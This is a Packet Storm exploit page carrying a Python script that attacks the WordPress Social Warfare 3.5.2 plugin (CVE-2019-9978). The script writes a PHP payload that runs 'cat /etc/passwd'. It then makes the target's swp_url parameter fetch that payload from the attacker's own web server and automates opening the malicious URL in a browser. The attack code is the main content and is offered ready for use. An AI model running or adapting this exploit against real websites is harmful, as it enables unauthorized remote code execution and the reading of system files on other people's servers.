exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Social Warfare 3.5.2 Remote Code Execution

WordPress Social Warfare 3.5.2 Remote Code Execution
Posted Jul 27, 2021
Authored by Raed Ahsan

WordPress Social Warfare plugin version 3.5.2 remote code execution exploit. This fully automated exploit is a variation of the original discovery made by Luka Sikic and hash3liZer in May of 2019.

tags | exploit, remote, code execution
advisories | CVE-2019-9978
SHA-256 | b785ce9bbb7301394cd05d0cd3354c1e425e2b69c30d276978e785ec476f8252

WordPress Social Warfare 3.5.2 Remote Code Execution

Change Mirror Download
# Author = Raed Ahsan
# Creation Date = 24/07/2021
# Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution
# Linkedin = https://linkedin.com/in/raed-ahsan/


import socket
import requests
import subprocess
import time
import pyautogui

print("[*]Start your python SimpleHTTPServer on port 1234 please...")
time.sleep(5)
# Creating the payload for wordpress url
with open("shell.txt", "w") as file:
file.write("<pre>system('cat /etc/passwd')</pre>")

print("[*]Payload has been created")

with open("url.txt", "w") as url:
url.write("http://{MACHINE_IP}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{YOUR_IP}:{YOUR_PYTHON_SERVER_PORT}/shell.txt")
print("[*]Use the URL in the url.txt")
print("[*]Make sure to edit the ip and port in the url.txt according to your needs")
"""
EDIT THE IP AND PORT IN THE URL.TXT FILE ACCORDING TO YOUR NEEDS
"""
print("[*]Moving the shell.txt to /var/www/html")
time.sleep(3)
username = input("What's your username in your machine: ")
subprocess.call([f'sudo cp /home/{username}/Desktop/shell.txt /var/www/html'], shell=True)
print("[*]File copied to /var/www/html")
time.sleep(2)
print("[*]Opening Apache2 service...")
print("[*]Make sure you have apache2 installed")
subprocess.call(["sudo service apache2 start"], shell=True)
print("[*]Service started")

machine_ip = input("Target Machine IP: ")

print("[*]Open your python listener at port 1234")

time.sleep(2)
print("[*]Opening Browser")

pyautogui.hotkey('winleft')
pyautogui.typewrite('chrome\n', 0.5)
pyautogui.typewrite(f'http://{machine_ip}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.200:1234/shell.txt\n', 0.2)

print("[*]If you're on tun0, make sure to change the ip in the auto execution of url section.")

print("If you want to edit the shellcode instead of /etc/passwd, do edit the shell.txt from /var/www/html and refresh the page")
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close